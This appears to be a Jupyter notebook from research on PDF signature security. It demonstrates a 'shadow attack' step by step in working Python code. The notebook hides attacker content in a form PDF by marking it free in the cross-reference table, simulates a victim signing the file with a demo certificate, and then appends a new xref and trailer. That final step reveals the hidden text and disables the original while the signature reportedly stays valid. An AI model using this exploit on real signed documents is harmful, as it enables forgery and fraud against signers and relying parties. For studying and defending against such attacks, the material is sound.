# Step 0: Configuration Parameters

In [None]:
filename_unsigned    = "2_original-document-shadowed.pdf" # We directly create the shadowed document for reasons of simplicity
filename_signed      = "3_original-document-shadowed-signed.pdf"
filename_manipulated = "4_original-document-shadowed-signed-manipulated.pdf"
original_text        = "1000 USD"
attacker_text        = "You are fired"


# Step 1: Inserting the shadow content

The attackers insert the malicious content which is correctly referenced but marked in the \gls{xref} as \emph{not in use}.

In [None]:
from reportlab.pdfgen import canvas
from reportlab.pdfbase import pdfform
from reportlab.lib.colors import black, white
from reportlab.pdfbase.acroform import AcroForm

c = canvas.Canvas(
    filename=filename_unsigned,
    pageCompression=False
)
form = AcroForm(c)
# Example based on:
# https://www.blog.pythonlibrary.org/2018/05/29/creating-interactive-pdf-forms-in-reportlab-with-python/
c.drawCentredString(220,700, 'Your Reward:')
form.textfield(name='original_text', y=660, value=original_text, x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
form.textfield(name='attacker_text', y=630, value=attacker_text, x=220, width=300, height=20, textColor=black, borderColor=white, borderWidth=0, forceBorder=False)
c.save()
# We now need to set the Attacker Object to "free"
pdf = bytearray(open(filename_unsigned, "rb").read())
# Detect form fields with overlays
attacker_objects = getObjectByNeedle(pdf,attacker_text)
for match in attacker_objects:
    objnr = match.group("objnr")
    gennr = int(match.group("gennr").decode())
    offset = match.start()
    needle = f"{offset:010} {gennr:05} n".encode()
    replace = f"{offset:010} {gennr:05} f".encode() 
    pdf = re.sub(needle, replace, pdf)
# Write file
with open(filename_unsigned, "wb") as fp:
    fp.write(pdf)
print(f"Successfully created {filename_unsigned}")

# Step 2: The Victim signs the document
We here simulate a victim who signs the document.

In [None]:
import datetime
from cryptography.hazmat import backends
from cryptography.hazmat.primitives.serialization import pkcs12
from endesive.pdf import cms
date = datetime.datetime.utcnow() - datetime.timedelta(hours=12)
date = date.strftime("D:%Y%m%d%H%M%S+00'00'")
dct = {
    "aligned": 0,
    "sigflagsft": 132,
    "sigpage": 0,
    "sigbutton": True,
    "sigfield": "Signature1",
    "sigandcertify": False,
    "signaturebox": (350, 350, 520, 300),
    "signature": "(Signed) I ultimatively agree",
    "contact": "Signer",
    "location": "AoE",
    "signingdate": date,
    "reason": "No reason given",
    "password": "1234",
}
with open("../../../resources/pdf-signer/demo-rsa2048.p12", "rb") as fp:
    p12 = pkcs12.load_key_and_certificates(
        fp.read(), b"demo-rsa2048", backends.default_backend()
    )
data_unsigned = open(filename_unsigned, "rb").read()
data_signature = cms.sign(data_unsigned, dct, p12[0], p12[1], p12[2], "sha256")
with open(filename_signed, "wb") as fp:
    fp.write(data_unsigned)
    fp.write(data_signature)
print(f"Successfully created {filename_signed}")


# Step 3: Making shadow content visible

The attackers append a new Xref table. The new Xref table enables the hidden content and disables the original one.

In [None]:
import sys
sys.path.append('../../../resources/lib/')
from pdfmanipulation import *
data_signed = bytearray(open(filename_signed, "rb").read())
# Detect form fields with overlays
attacker_objects = getObjectByNeedle(data_signed,attacker_text)#[:2]
original_objects = getObjectByNeedle(data_signed,original_text)[:2]


# For the xref_update, we need to determine all byte offsets of the form fields
offset = len(data_signed)+1

# Now we create a simply xref_update
xref_update = b"""
xref
0 1 
0000000000 65535 f 
"""
for match in original_objects:
    objnr = match.group("objnr")
    gennr = int(match.group("gennr").decode())
    offset = match.start()
    xref_update += objnr + b" 1 \n"
    xref_update += f"{offset:010} {gennr:05} f \n".encode()
for match in attacker_objects:
    objnr = match.group("objnr")
    gennr = int(match.group("gennr").decode())
    offset = match.start()
    xref_update += objnr + b" 1 \n"
    xref_update += f"{offset:010} {gennr:05} n \n".encode()

# Now we create a simple trailer update
# Most values are simply copied from the previous trailer (which is the signed trailer)
previous_trailer = getTrailer(data_signed)[-1]
previous_startxref = getStartxref(data_signed)[-1].group("value").decode()
trailer_update = f"""
trailer
<<
/Size {previous_trailer.group("size").decode()}
/Root {previous_trailer.group("root").decode()}
/Info {previous_trailer.group("info").decode()}
/ID {previous_trailer.group("id").decode()}
/Prev {previous_startxref}
>>
startxref
{len(data_signed)+1}
%%EOF
""".encode()

# Finally, we write the manipulated file.
# The signature remains valid, but the attacker content is shown
with open(filename_manipulated, "wb") as fp:
    fp.write(data_signed)
    fp.write(xref_update)
    fp.write(trailer_update)

print(f"Successfully created {filename_manipulated}")